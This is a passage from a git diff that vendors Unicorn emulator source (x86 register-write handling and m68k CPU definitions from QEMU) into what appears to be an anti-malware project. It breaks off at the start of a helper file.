mycpu)->env.regs[R_EBP] = *(uint64_t *)value; + break; + case UC_X86_REG_EBP: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint32_t *)value); + break; + case UC_X86_REG_BP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint16_t *)value); + break; + case UC_X86_REG_BPL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint8_t *)value); + break; + case UC_X86_REG_RSI: + X86_CPU(uc, mycpu)->env.regs[R_ESI] = *(uint64_t *)value; + break; + case UC_X86_REG_ESI: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint32_t *)value); + break; + case UC_X86_REG_SI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint16_t *)value); + break; + case UC_X86_REG_SIL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint8_t *)value); + break; + case UC_X86_REG_RDI: + X86_CPU(uc, mycpu)->env.regs[R_EDI] = *(uint64_t *)value; + break; + case UC_X86_REG_EDI: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint32_t *)value); + break; + case UC_X86_REG_DI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint16_t *)value); + break; + case UC_X86_REG_DIL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint8_t *)value); + break; + case UC_X86_REG_RIP: + X86_CPU(uc, mycpu)->env.eip = *(uint64_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_EIP: + X86_CPU(uc, mycpu)->env.eip = *(uint32_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_IP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.eip, *(uint16_t *)value); + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_CS: + X86_CPU(uc, mycpu)->env.segs[R_CS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_DS: + X86_CPU(uc, mycpu)->env.segs[R_DS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_SS: + X86_CPU(uc, mycpu)->env.segs[R_SS].selector = *(uint16_t *)value; + break; + case UC_X86_REG_ES: + X86_CPU(uc, mycpu)->env.segs[R_ES].selector = *(uint16_t *)value; + break; + case UC_X86_REG_FS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + break; + case UC_X86_REG_GS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + break; + case UC_X86_REG_R8: + X86_CPU(uc, mycpu)->env.regs[8] = *(uint64_t *)value; + break; + case UC_X86_REG_R8D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[8], *(uint32_t *)value); + break; + case UC_X86_REG_R8W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[8], *(uint16_t *)value); + break; + case UC_X86_REG_R8B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[8], *(uint8_t *)value); + break; + case UC_X86_REG_R9: + X86_CPU(uc, mycpu)->env.regs[9] = *(uint64_t *)value; + break; + case UC_X86_REG_R9D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[9], *(uint32_t *)value); + break; + case UC_X86_REG_R9W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[9], *(uint16_t *)value); + break; + case UC_X86_REG_R9B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[9], *(uint8_t *)value); + break; + case UC_X86_REG_R10: + X86_CPU(uc, mycpu)->env.regs[10] = *(uint64_t *)value; + break; + case UC_X86_REG_R10D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[10], *(uint32_t *)value); + break; + case UC_X86_REG_R10W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[10], *(uint16_t *)value); + break; + case UC_X86_REG_R10B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[10], *(uint8_t *)value); + break; + case UC_X86_REG_R11: + X86_CPU(uc, mycpu)->env.regs[11] = *(uint64_t *)value; + break; + case UC_X86_REG_R11D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[11], *(uint32_t *)value); + break; + case UC_X86_REG_R11W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[11], *(uint16_t *)value); + break; + case UC_X86_REG_R11B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[11], *(uint8_t *)value); + break; + case UC_X86_REG_R12: + X86_CPU(uc, mycpu)->env.regs[12] = *(uint64_t *)value; + break; + case UC_X86_REG_R12D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[12], *(uint32_t *)value); + break; + case UC_X86_REG_R12W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[12], *(uint16_t *)value); + break; + case UC_X86_REG_R12B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[12], *(uint8_t *)value); + break; + case UC_X86_REG_R13: + X86_CPU(uc, mycpu)->env.regs[13] = *(uint64_t *)value; + break; + case UC_X86_REG_R13D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[13], *(uint32_t *)value); + break; + case UC_X86_REG_R13W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[13], *(uint16_t *)value); + break; + case UC_X86_REG_R13B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[13], *(uint8_t *)value); + break; + case UC_X86_REG_R14: + X86_CPU(uc, mycpu)->env.regs[14] = *(uint64_t *)value; + break; + case UC_X86_REG_R14D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[14], *(uint32_t *)value); + break; + case UC_X86_REG_R14W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[14], *(uint16_t *)value); + break; + case UC_X86_REG_R14B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[14], *(uint8_t *)value); + break; + case UC_X86_REG_R15: + X86_CPU(uc, mycpu)->env.regs[15] = *(uint64_t *)value; + break; + case UC_X86_REG_R15D: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[15], *(uint32_t *)value); + break; + case UC_X86_REG_R15W: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[15], *(uint16_t *)value); + break; + case UC_X86_REG_R15B: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[15], *(uint8_t *)value); + break; + case UC_X86_REG_IDTR: + X86_CPU(uc, mycpu)->env.idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.idt.base = ((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_GDTR: + X86_CPU(uc, mycpu)->env.gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.gdt.base = ((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_LDTR: + X86_CPU(uc, mycpu)->env.ldt.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.ldt.base = ((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.ldt.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_TR: + X86_CPU(uc, mycpu)->env.tr.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.tr.base = ((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.tr.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_MSR: + x86_msr_write(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + cpu_set_mxcsr(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + case UC_X86_REG_XMM8: + case UC_X86_REG_XMM9: + case UC_X86_REG_XMM10: + case UC_X86_REG_XMM11: + case UC_X86_REG_XMM12: + case UC_X86_REG_XMM13: + case UC_X86_REG_XMM14: + case UC_X86_REG_XMM15: + { + float64 *src = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + reg->_d[0] = src[0]; + reg->_d[1] = src[1]; + break; + } + case UC_X86_REG_FS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_FS].base = *(uint64_t *)value; + continue; + case UC_X86_REG_GS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_GS].base = *(uint64_t *)value; + continue; + } + break; +#endif + } + } + + return 0; +} + +DEFAULT_VISIBILITY +int x86_uc_machine_init(struct uc_struct *uc) +{ + return machine_initialize(uc); +} + +static bool x86_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case EXCP06_ILLOP: + return true; + } +} + +void pc_machine_init(struct uc_struct *uc); + +static bool x86_insn_hook_validate(uint32_t insn_enum) +{ + //for x86 we can only hook IN, OUT, and SYSCALL + if (insn_enum != UC_X86_INS_IN + && insn_enum != UC_X86_INS_OUT + && insn_enum != UC_X86_INS_SYSCALL + && insn_enum != UC_X86_INS_SYSENTER) { + return false; + } + return true; +} + +DEFAULT_VISIBILITY +void x86_uc_init(struct uc_struct* uc) +{ + apic_register_types(uc); + apic_common_register_types(uc); + register_accel_types(uc); + pc_machine_register_types(uc); + x86_cpu_register_types(uc); + pc_machine_init(uc); // pc_piix + uc->reg_read = x86_reg_read; + uc->reg_write = x86_reg_write; + uc->reg_reset = x86_reg_reset; + uc->release = x86_release; + uc->set_pc = x86_set_pc; + uc->stop_interrupt = x86_stop_interrupt; + uc->insn_hook_validate = x86_insn_hook_validate; + uc_common_init(uc); +} + +/* vim: set ts=4 sts=4 sw=4 et: */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h new file mode 100644 index 0000000..cb29200 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.h @@ -0,0 +1,17 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_I386_H +#define UC_QEMU_TARGET_I386_H + +// functions to read & write registers +int x86_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int x86_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void x86_reg_reset(struct uc_struct *uc); + +void x86_uc_init(struct uc_struct* uc); +int x86_uc_machine_init(struct uc_struct *uc); + +extern const int X86_REGS_STORAGE_SIZE; +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs new file mode 100644 index 0000000..f87fde4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/Makefile.objs @@ -0,0 +1,2 @@ +obj-y += translate.o op_helper.o helper.o cpu.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h new file mode 100644 index 0000000..d8a4917 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu-qom.h @@ -0,0 +1,83 @@ +/* + * QEMU Motorola 68k CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_M68K_CPU_QOM_H +#define QEMU_M68K_CPU_QOM_H + +#include "qom/cpu.h" + +#define TYPE_M68K_CPU "m68k-cpu" + +#define M68K_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, M68kCPUClass, (klass), TYPE_M68K_CPU) +#define M68K_CPU(uc, obj) ((M68kCPU *)obj) +#define M68K_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, M68kCPUClass, (obj), TYPE_M68K_CPU) + +/** + * M68kCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * A Motorola 68k CPU model. + */ +typedef struct M68kCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} M68kCPUClass; + +/** + * M68kCPU: + * @env: #CPUM68KState + * + * A Motorola 68k CPU. + */ +typedef struct M68kCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUM68KState env; +} M68kCPU; + +static inline M68kCPU *m68k_env_get_cpu(CPUM68KState *env) +{ + return container_of(env, M68kCPU, env); +} + +#define ENV_GET_CPU(e) CPU(m68k_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(M68kCPU, env) + +void m68k_cpu_do_interrupt(CPUState *cpu); +bool m68k_cpu_exec_interrupt(CPUState *cpu, int int_req); +void m68k_cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); +hwaddr m68k_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int m68k_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int m68k_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void m68k_cpu_exec_enter(CPUState *cs); +void m68k_cpu_exec_exit(CPUState *cs); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c new file mode 100644 index 0000000..f000648 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c @@ -0,0 +1,242 @@ +/* + * QEMU Motorola 68k CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ + +#include "hw/m68k/m68k.h" +#include "cpu.h" +#include "qemu-common.h" + + +static void m68k_cpu_set_pc(CPUState *cs, vaddr value) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + + cpu->env.pc = value; +} + +static bool m68k_cpu_has_work(CPUState *cs) +{ + return cs->interrupt_request & CPU_INTERRUPT_HARD; +} + +static void m68k_set_feature(CPUM68KState *env, int feature) +{ + env->features |= (1u << feature); +} + +/* CPUClass::reset() */ +static void m68k_cpu_reset(CPUState *s) +{ + M68kCPU *cpu = M68K_CPU(s->uc, s); + M68kCPUClass *mcc = M68K_CPU_GET_CLASS(s->uc, cpu); + CPUM68KState *env = &cpu->env; + + mcc->parent_reset(s); + + memset(env, 0, offsetof(CPUM68KState, features)); +#if !defined(CONFIG_USER_ONLY) + env->sr = 0x2700; +#endif + m68k_switch_sp(env); + /* ??? FP regs should be initialized to NaN. */ + env->cc_op = CC_OP_FLAGS; + /* TODO: We should set PC from the interrupt vector. */ + env->pc = 0; + tlb_flush(s, 1); +} + +/* CPU models */ + +static ObjectClass *m68k_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (cpu_model == NULL) { + return NULL; + } + + typename = g_strdup_printf("%s-" TYPE_M68K_CPU, cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + if (oc != NULL && (object_class_dynamic_cast(uc, oc, TYPE_M68K_CPU) == NULL || + object_class_is_abstract(oc))) { + return NULL; + } + return oc; +} + +static void m5206_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); +} + +static void m5208_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_USP); +} + +static void cfv4e_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_FPU); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_USP); +} + +static void any_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_FPU); + /* MAC and EMAC are mututally exclusive, so pick EMAC. + It's mostly backwards compatible. */ + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC_B); + m68k_set_feature(env, M68K_FEATURE_USP); + m68k_set_feature(env, M68K_FEATURE_EXT_FULL); + m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); +} + +typedef struct M68kCPUInfo { + const char *name; + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); +} M68kCPUInfo; + +static const M68kCPUInfo m68k_cpus[] = { + { "m5206", m5206_cpu_initfn }, + { "m5208", m5208_cpu_initfn }, + { "cfv4e", cfv4e_cpu_initfn }, + { "any", any_cpu_initfn }, +}; + +static int m68k_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + M68kCPUClass *mcc = M68K_CPU_GET_CLASS(uc, dev); + + cpu_reset(cs); + qemu_init_vcpu(cs); + + mcc->parent_realize(cs->uc, dev, errp); + + return 0; +} + +static void m68k_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + if (tcg_enabled(uc)) { + m68k_tcg_init(uc); + } +} + +static void m68k_cpu_class_init(struct uc_struct *uc, ObjectClass *c, void *data) +{ + M68kCPUClass *mcc = M68K_CPU_CLASS(uc, c); + CPUClass *cc = CPU_CLASS(uc, c); + DeviceClass *dc = DEVICE_CLASS(uc, c); + + mcc->parent_realize = dc->realize; + dc->realize = m68k_cpu_realizefn; + + mcc->parent_reset = cc->reset; + cc->reset = m68k_cpu_reset; + + cc->class_by_name = m68k_cpu_class_by_name; + cc->has_work = m68k_cpu_has_work; + cc->do_interrupt = m68k_cpu_do_interrupt; + cc->cpu_exec_interrupt = m68k_cpu_exec_interrupt; + cc->set_pc = m68k_cpu_set_pc; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = m68k_cpu_handle_mmu_fault; +#else + cc->get_phys_page_debug = m68k_cpu_get_phys_page_debug; +#endif + cc->cpu_exec_enter = m68k_cpu_exec_enter; + cc->cpu_exec_exit = m68k_cpu_exec_exit; +} + +static void register_cpu_type(void *opaque, const M68kCPUInfo *info) +{ + TypeInfo type_info = {0}; + type_info.parent = TYPE_M68K_CPU, + type_info.instance_init = info->instance_init, + + type_info.name = g_strdup_printf("%s-" TYPE_M68K_CPU, info->name); + type_register(opaque, &type_info); + g_free((void *)type_info.name); +} + +void m68k_cpu_register_types(void *opaque) +{ + const TypeInfo m68k_cpu_type_info = { + TYPE_M68K_CPU, + TYPE_CPU, + + sizeof(M68kCPUClass), + sizeof(M68kCPU), + opaque, + + m68k_cpu_initfn, + NULL, + NULL, + + NULL, + + m68k_cpu_class_init, + NULL, + NULL, + + true, + }; + + int i; + + type_register_static(opaque, &m68k_cpu_type_info); + for (i = 0; i < ARRAY_SIZE(m68k_cpus); i++) { + register_cpu_type(opaque, &m68k_cpus[i]); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h new file mode 100644 index 0000000..40f66b4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h @@ -0,0 +1,259 @@ +/* + * m68k virtual CPU header + * + * Copyright (c) 2005-2007 CodeSourcery + * Written by Paul Brook + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#ifndef CPU_M68K_H +#define CPU_M68K_H + +#define TARGET_LONG_BITS 32 + +#define CPUArchState struct CPUM68KState + +#include "config.h" +#include "qemu-common.h" +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define MAX_QREGS 32 + +#define TARGET_HAS_ICE 1 + +#define ELF_MACHINE EM_68K + +#define EXCP_ACCESS 2 /* Access (MMU) error. */ +#define EXCP_ADDRESS 3 /* Address error. */ +#define EXCP_ILLEGAL 4 /* Illegal instruction. */ +#define EXCP_DIV0 5 /* Divide by zero */ +#define EXCP_PRIVILEGE 8 /* Privilege violation. */ +#define EXCP_TRACE 9 +#define EXCP_LINEA 10 /* Unimplemented line-A (MAC) opcode. */ +#define EXCP_LINEF 11 /* Unimplemented line-F (FPU) opcode. */ +#define EXCP_DEBUGNBP 12 /* Non-breakpoint debug interrupt. */ +#define EXCP_DEBEGBP 13 /* Breakpoint debug interrupt. */ +#define EXCP_FORMAT 14 /* RTE format error. */ +#define EXCP_UNINITIALIZED 15 +#define EXCP_TRAP0 32 /* User trap #0. */ +#define EXCP_TRAP15 47 /* User trap #15. */ +#define EXCP_UNSUPPORTED 61 +#define EXCP_ICE 13 + +#define EXCP_RTE 0x100 +#define EXCP_HALT_INSN 0x101 + +#define NB_MMU_MODES 2 + +typedef struct CPUM68KState { + uint32_t dregs[8]; + uint32_t aregs[8]; + uint32_t pc; + uint32_t sr; + + /* SSP and USP. The current_sp is stored in aregs[7], the other here. */ + int current_sp; + uint32_t sp[2]; + + /* Condition flags. */ + uint32_t cc_op; + uint32_t cc_dest; + uint32_t cc_src; + uint32_t cc_x; + + float64 fregs[8]; + float64 fp_result; + uint32_t fpcr; + uint32_t fpsr; + float_status fp_status; + + uint64_t mactmp; + /* EMAC Hardware deals with 48-bit values composed of one 32-bit and + two 8-bit parts. We store a single 64-bit value and + rearrange/extend this when changing modes. */ + uint64_t macc[4]; + uint32_t macsr; + uint32_t mac_mask; + + /* Temporary storage for DIV helpers. */ + uint32_t div1; + uint32_t div2; + + /* MMU status. */ + struct { + uint32_t ar; + } mmu; + + /* Control registers. */ + uint32_t vbr; + uint32_t mbar; + uint32_t rambar0; + uint32_t cacr; + + int pending_vector; + int pending_level; + + uint32_t qregs[MAX_QREGS]; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + uint32_t features; + + // Unicorn engine + struct uc_struct *uc; +} CPUM68KState; + +#include "cpu-qom.h" + +void m68k_tcg_init(struct uc_struct *uc); +M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model); +int cpu_m68k_exec(struct uc_struct *uc, CPUM68KState *s); +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. */ +int cpu_m68k_signal_handler(int host_signum, void *pinfo, + void *puc); +void cpu_m68k_flush_flags(CPUM68KState *, int); + +enum { + CC_OP_DYNAMIC, /* Use env->cc_op */ + CC_OP_FLAGS, /* CC_DEST = CVZN, CC_SRC = unused */ + CC_OP_LOGIC, /* CC_DEST = result, CC_SRC = unused */ + CC_OP_ADD, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SUB, /* CC_DEST = result, CC_SRC = source */ + CC_OP_CMPB, /* CC_DEST = result, CC_SRC = source */ + CC_OP_CMPW, /* CC_DEST = result, CC_SRC = source */ + CC_OP_ADDX, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SUBX, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SHIFT, /* CC_DEST = result, CC_SRC = carry */ +}; + +#define CCF_C 0x01 +#define CCF_V 0x02 +#define CCF_Z 0x04 +#define CCF_N 0x08 +#define CCF_X 0x10 + +#define SR_I_SHIFT 8 +#define SR_I 0x0700 +#define SR_M 0x1000 +#define SR_S 0x2000 +#define SR_T 0x8000 + +#define M68K_SSP 0 +#define M68K_USP 1 + +/* CACR fields are implementation defined, but some bits are common. */ +#define M68K_CACR_EUSP 0x10 + +#define MACSR_PAV0 0x100 +#define MACSR_OMC 0x080 +#define MACSR_SU 0x040 +#define MACSR_FI 0x020 +#define MACSR_RT 0x010 +#define MACSR_N 0x008 +#define MACSR_Z 0x004 +#define MACSR_V 0x002 +#define MACSR_EV 0x001 + +void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector); +void m68k_set_macsr(CPUM68KState *env, uint32_t val); +void m68k_switch_sp(CPUM68KState *env); + +#define M68K_FPCR_PREC (1 << 6) + +void do_m68k_semihosting(CPUM68KState *env, int nr); + +/* There are 4 ColdFire core ISA revisions: A, A+, B and C. + Each feature covers the subset of instructions common to the + ISA revisions mentioned. */ + +enum m68k_features { + M68K_FEATURE_CF_ISA_A, + M68K_FEATURE_CF_ISA_B, /* (ISA B or C). */ + M68K_FEATURE_CF_ISA_APLUSC, /* BIT/BITREV, FF1, STRLDSR (ISA A+ or C). */ + M68K_FEATURE_BRAL, /* Long unconditional branch. (ISA A+ or B). */ + M68K_FEATURE_CF_FPU, + M68K_FEATURE_CF_MAC, + M68K_FEATURE_CF_EMAC, + M68K_FEATURE_CF_EMAC_B, /* Revision B EMAC (dual accumulate). */ + M68K_FEATURE_USP, /* User Stack Pointer. (ISA A+, B or C). */ + M68K_FEATURE_EXT_FULL, /* 68020+ full extension word. */ + M68K_FEATURE_WORD_INDEX /* word sized address index registers. */ +}; + +static inline int m68k_feature(CPUM68KState *env, int feature) +{ + return (env->features & (1u << feature)) != 0; +} + +void m68k_cpu_list(FILE *f, fprintf_function cpu_fprintf); + +void register_m68k_insns (CPUM68KState *env); + +#ifdef CONFIG_USER_ONLY +/* Linux uses 8k pages. */ +#define TARGET_PAGE_BITS 13 +#else +/* Smallest TLB entry size is 1k. */ +#define TARGET_PAGE_BITS 10 +#endif + +#define TARGET_PHYS_ADDR_SPACE_BITS 32 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 + +static inline CPUM68KState *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + M68kCPU *cpu = cpu_m68k_init(uc, cpu_model); + if (cpu == NULL) { + return NULL; + } + return &cpu->env; +} + +#define cpu_exec cpu_m68k_exec +#define cpu_gen_code cpu_m68k_gen_code +#define cpu_signal_handler cpu_m68k_signal_handler +#define cpu_list m68k_cpu_list + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _kernel +#define MMU_MODE1_SUFFIX _user +#define MMU_USER_IDX 1 +static inline int cpu_mmu_index (CPUM68KState *env) +{ + return (env->sr & SR_S) == 0 ? 1 : 0; +} + +int m68k_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); + +#include "exec/cpu-all.h" + +static inline void cpu_get_tb_cpu_state(CPUM68KState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *pc = env->pc; + *cs_base = 0; + *flags = (env->fpcr & M68K_FPCR_PREC) /* Bit 6 */ + | (env->sr & SR_S) /* Bit 13 */ + | ((env->macsr >> 4) & 0xf); /* Bits 0-3 */ +} + +#include "exec/exec-all.h" + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c new file mode 100644 index 0000000..3ecc496 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c @@ -0,0 +1,799 @@ +/* + * m68k op helpers + * + * Copyright (c) 2006-2007 CodeSourcery + * Written by Paul Brook 